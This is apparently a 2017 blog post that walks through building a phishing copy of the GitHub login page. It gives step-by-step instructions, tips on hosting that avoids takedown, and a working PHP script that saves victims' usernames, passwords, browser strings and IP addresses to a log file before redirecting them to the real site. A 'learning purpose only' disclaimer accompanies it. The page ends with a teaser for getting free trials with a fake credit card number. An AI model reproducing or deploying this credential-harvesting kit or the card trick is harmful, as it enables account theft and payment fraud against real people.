Sunday, March 19, 2017

Phishing Attacks

How Do Phishing Websites Reach You?

Opening a phishing email 
Clicking a suspicious ad
 Accessing a fake login page
Engaging in social media
etc........
now lets see how to create one??

This is done for learning purpose only and the intention was not to harm any commercial websites.

Hey Folks !! I recently tried with many free hosting services such as www.5gbfree.com, www. freehosting.com, www.byet.host,x10hosting.com (not available for our region) but could use by connecting to a VPN. 

All of these free hosting servers were able to detect the phishing activities going around and got removed the harmful content and even got suspended the account.


As a matter of that I tried to host it on one of my own dedicated server. Guess what happened the domain got suspended for several weeks.



So if you are trying to create a phishing site or tired of free hosting services, from my own personal experience I advice you to not to host it on your personal servers.

Lets get Started..

What is Phishing?? 

"Phishing is a some sort of a  fraud in which the attacker tries to learn information such as login credentials or account information by pretend to be someone is not as a reputable entity or person in email or other communication channels."

Here is the phishing site that I created   ----------->    www.github.com

1.Choose a accurate hosting provider.

           * For this phishing activity I used www.000webhost.com

2.After creating a hosting account create an index.html file in the public folder and copy the page source that you need to implement the phishing activity.



3.Paste the page source in index file.


Now our phishing site looks exactly the same as the original github login page.but now it with a different URL, comparing to the original web page.



4.Go to edit mode and modify the content.
          * Find the keyword called "action"



5.Change the link address to post.php



6.Do the changes and create a post.php script in the same path and try with these codes.

<?php
//writing the credentials to variables 
$un = $_POST["username"];
$pass = $_POST["password"];
$browser = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER[REMOTE_ADDR];
$line = date('Y-m-d');
//opening the text file and writing the credentials
$datafile= fopen("log.txt","a") or die("Error");
$txt = "\n \n USERNAME = $un\n PASSWORD = $pass\n Web Browser = $browser\n IP Address = $ip\n Date = $line\n";
fwrite($datafile,"\n". $txt);
fclose($datafile);
//redirecting to home page 
header("Location: https://github.com");
exit();
?>




That's all here about phishing. Let's give it a try and see..



Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to ...